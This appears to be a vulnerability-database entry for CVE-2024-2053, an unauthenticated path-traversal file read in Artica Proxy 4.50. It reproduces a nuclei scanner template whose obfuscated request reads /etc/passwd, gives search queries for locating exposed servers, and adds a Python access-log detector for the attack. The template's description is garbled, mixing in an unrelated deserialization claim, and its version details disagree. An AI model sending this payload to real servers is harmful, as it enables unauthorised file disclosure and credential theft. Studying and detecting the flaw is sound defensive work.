Artica Proxy Unauthenticated LFI Vulnerability

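Vulnerability Information

Vulnerability name: Artica Proxy Unauthenticated LFI Vulnerability

Vulnerability ID:

  • CVE: CVE-2024-2053

Vulnerability type: File read

Severity: High

Description: Artica Proxy is a widely used proxy server management product that provides a web administration interface and is commonly found in enterprise networks, where it is used to manage network traffic and proxy services. In version 4.50, the web administration interface contains an unauthenticated local file inclusion (LFI) vulnerability that allows unauthenticated users to bypass security restrictions and read arbitrary files on the server by crafting specific HTTP requests. The root cause is that the web application fails to properly validate user-supplied input, so an attacker can use path traversal to access restricted files. The vulnerability can lead to disclosure of sensitive information, such as the system password file, which may then be used in further attacks. Because no authentication is required and exploitation can be automated, the security risk is high; users are advised to update to a fixed version promptly.

Vendor: articatech

Product: artica_proxy

Affected version: 4.50

Search syntax: http.html:"artica" OR body="artica"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/c038a828a506aac8054c6f1527aed1f7cf3427b7/http%2Fcves%2F2024%2FCVE-2024-2053.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details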

id: CVE-2024-2053

info:
  name: Artica Proxy - Unauthenticated LFI
  author: pussycat0x
  severity: high
  description: |
    The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user.
  reference:
    - https://github.com/0xMarcio/cve/blob/main/2024/CVE-2024-2053.md#cve-2024-2053
    - https://seclists.org/fulldisclosure/2024/Mar/11
    - https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-2053
    cwe-id: CWE-23
    epss-score: 0.00434
    epss-percentile: 0.61897
    cpe: cpe:2.3:a:articatech:artica_proxy:4.40:*:*:*:*:*:*:*
  metadata:
    vendor: articatech
    product: artica_proxy
    shodan-query: http.html:"artica"
    fofa-query: body="artica"
    verified: true
    max-request: 1
  tags: cve,cve2024,lfi,artica-proxy,articatech

http:
  - raw:
      - |
        GET /images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: body
        words:
          - "application/force-download"

      - type: status
        status:
          - 200
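
For defenders, the request in the template above can be hunted for in web server access logs. The following is an added example, not part of the nuclei template or of Artica's code: it assumes combined-format access logs, and the sample log lines, function names and decoding depth are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [05/Mar/2024:10:01:02 +0000] "GET /images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd HTTP/1.1" 200 1432 "-" "curl/8.4.0"
198.51.100.7 - - [05/Mar/2024:10:01:09 +0000] "GET /images.listener.php?uri=1&mailattach=%252e%252e%252fsecret HTTP/1.1" 404 0 "-" "curl/8.4.0"
192.0.2.10 - - [05/Mar/2024:10:02:00 +0000] "GET /images.listener.php?uri=1&mailattach=report.pdf HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Mar/2024:10:02:05 +0000] "GET /index.php?mailattach=../x HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
ENDPOINT = "/images.listener.php"  # endpoint named in the template

def fully_decode(value, rounds=5):
    """Percent-decode repeatedly so double-encoded dots and slashes are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True for dot-dot sequences, absolute paths or backslashes in the parameter."""
    v = fully_decode(value)
    return ".." in v or v.startswith("/") or "\\" in v

def scan(log_text):
    """Return (client_ip, status, decoded_value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        url = urlsplit(target)
        if url.path != ENDPOINT:
            continue
        # parse_qs decodes once; fully_decode handles any further layers.
        for value in parse_qs(url.query).get("mailattach", []):
            if is_traversal(value):
                findings.append((ip, int(status), fully_decode(value)))
    return findings

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        verdict = "likely served" if status == 200 else "blocked or missing"
        print(f"{ip} status={status} ({verdict}) mailattach={value}")
```

A hit with status 200 warrants checking which file was returned and rotating any credentials it contained.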